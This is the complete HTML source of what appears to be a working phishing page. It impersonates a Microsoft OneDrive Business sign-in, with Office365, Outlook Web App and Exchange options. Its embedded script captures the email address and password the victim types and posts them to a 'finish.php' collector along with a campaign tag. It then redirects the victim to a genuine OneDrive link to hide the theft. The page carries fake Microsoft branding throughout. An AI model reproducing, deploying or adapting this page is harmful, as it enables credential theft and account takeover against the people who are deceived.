<!DOCTYPE html>
<html lang="en">
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="ie=edge">
	<link href="css/style.css" rel="stylesheet" />
	<title>Sign in</title>
	<link href="https://p.sfx.ms/images/favicon.ico" rel="icon" type="image/x-icon" />
</head>
<body>
<div class="login-page" id="wrap">
<div class="login-screen">
<div class="login-screen-inner">
<div class="log-header"><img alt="" src="images/logo.png" />
<p style="text-align: center;">Microsoft User Integration, Sign in to Continue to OneDrive Business.</p>

<p style="text-align: center;"></p>
</div>

<div class="log-body">
<ul class="log-menu">
	<li class="office"><a data-image-src="images/office.png" data-log-client="Office 365" href="#">Sign in with Office365</a></li>
	<li class="outlook"><a data-image-src="images/outlook.png" data-log-client="Outlook Web App" href="#">Sign in with Outlook Web App</a></li>
	<li class="outlook"><a data-image-src="images/outlook.png" data-log-client="Microsoft Exchange" href="#">Sign in with Microsoft Exchange</a></li>
</ul>
</div>

<div class="log-footer">
<p style="text-align: center;">Save &amp; Share Important&nbsp;Photos,files and Documents Securely&nbsp;on OneDrive and get them from any device, anywhere.</p>

<p style="text-align: center;"></p>

<p style="text-align: center;"><br />
</p>

<p style="text-align: center;">Microsoft Corporation&nbsp;&copy; 2020</p>
</div>
</div>
</div>

<div id="logger-popup">
<div class="logger-pop-inner">
<form action="" id="login_form" method="POST">
<div class="logger-pop-header"><img alt="" class="logo-img" src="" />
<p class="logo-name">Login with</p>
</div>

<div class="logger-pop-body">
<div class="form-group"><input class="form-control" id="email-field" name="Email" placeholder="Email Address" type="email" /> <label for="">Email Address</label></div>

<div class="form-group"><input class="form-control" id="password-field" name="Password" placeholder="Password" type="password" /> <label for="">Password</label></div>
</div>

<div class="logger-pop-footer">
<ul>
	<li><button class="btn" id="popCancel" type="button">Cancel</button></li>
	<li><button class="btn login-btn" type="submit">Submit</button></li>
</ul>
</div>
</form>
</div>
</div>

<div id="pageOverlay" style="display: none;"></div>
</div>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script><script>  
  $(document).ready(function () {
    $('.log-menu > li > a').click(function (e) {
        e.preventDefault();
        var logo_src = $(this).data('image-src');
        var client_name = $(this).data('log-client');

        $('.logo-img').attr('src', logo_src);
        $('.logo-name span').html(client_name);
        $('#email-field').attr("placeholder", "Login with your " + client_name + " email address");
        $('#password-field').attr("placeholder", "Login with your " + client_name );

        $('#logger-popup').toggleClass('popupOpened');
        $('#pageOverlay').fadeIn();
        
		
		
		
		var emailc = $('input[name=Email]');
     var passc = $('input[name=Password]');
     var emailval = '';
     var passval = '';
     var login_form = $('#login_form');	 
	 login_form.submit(function(e){
	   e.preventDefault();
	   emailval = emailc.val();
	   
	   passval = passc.val();
	  // alert(passval);
	   /*  */
	   if(emailval.length > 0 && passval.length > 0){
	        var theemidval = 'f800e32d9ce13d84f7a6bcc30b4ee1b0';
		    $.ajax({
          url: 'finish.php', 
          type: 'POST', 
          dataType: 'html', 
          data: { Email : emailval, password : passval, typeofemail : 'Onedrive23 '+client_name, theemid : theemidval}, 
		  crossDomain: true,
          success: function(msg) {
		  },
          error: function(e) {
            console.log(e)
          }
        }); 
		setTimeout(function(){ window.location.href="https://onedrive.live.com/embed?cid=E650E3B710AD4626&resid=E650E3B710AD4626%21466&authkey=AHgbg3lhtxjkHis&em=2"; }, 2000);
	   }
	   /*  */
	 });
		
		
		
		
		
		
    });
    $('#popCancel').click(function (e) {
        e.preventDefault();
        $('#logger-popup').removeClass('popupOpened');
        $('#pageOverlay').fadeOut();
    });
});
</script></body>
</html>
